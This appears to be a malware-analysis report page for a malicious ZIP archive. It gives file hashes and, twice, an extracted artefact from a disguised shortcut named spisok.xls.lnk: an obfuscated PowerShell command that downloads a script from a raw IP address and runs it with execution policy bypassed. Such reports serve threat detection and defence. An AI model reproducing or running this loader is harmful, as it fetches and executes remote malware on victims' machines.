Malicious

042e9517635c79baed62e6a6d68cb83e

ZIP Archive
|
MD5: 042e9517635c79baed62e6a6d68cb83e
|
Size: 19.66 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	042e9517635c79baed62e6a6d68cb83e
Sha1	c1533f981962cd1932d905be4a8653896384d893
Sha256	560c13111a07b56734f8456637e9ba9021a84f58347bde2d412937c43b05f12f
Sha384	53ab5de93f7685be137ce32721199f804b4633867ebf57482854a66cebb5e9bf77695b2eeaa201c048b58a0181f297fe
Sha512	c926453e22aeeafebc36326ca355b414296b60fb4ff4b16186572ce936666c958e59297cc1083fb3dba85ec9eb928d40e409a984e5c58eabbbd2985019e12a20
SSDeep	24:xG/qifP6CnCEfPCzuikVQ4jnsNyxWaAl73lUt8GOUba//sY:x2H6yxfPKYVQ4jnkpUtbHa//sY
TLSH	50925E306F75020CF4736E3DE8769215586A347C9A32D74C1440DA9AC932A01D7B6F2E

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe /w 1 echo LJaOYJhcYWSDpHfJQd; $a = -join (0x69,0x77,0x72 \| % {[char]$_}); .($a) -uri http:''/''/''18''5''.2''08.1''5''8''.''126/sss04n111k/draft.ps1 -OutFile draft.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\draft.ps1"

042e9517635c79baed62e6a6d68cb83e (19.66 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe /w 1 echo LJaOYJhcYWSDpHfJQd; $a = -join (0x69,0x77,0x72 \| % {[char]$_}); .($a) -uri http:''/''/''18''5''.2''08.1''5''8''.''126/sss04n111k/draft.ps1 -OutFile draft.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\draft.ps1" Malicious	042e9517635c79baed62e6a6d68cb83e > spisok.xls.lnk

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙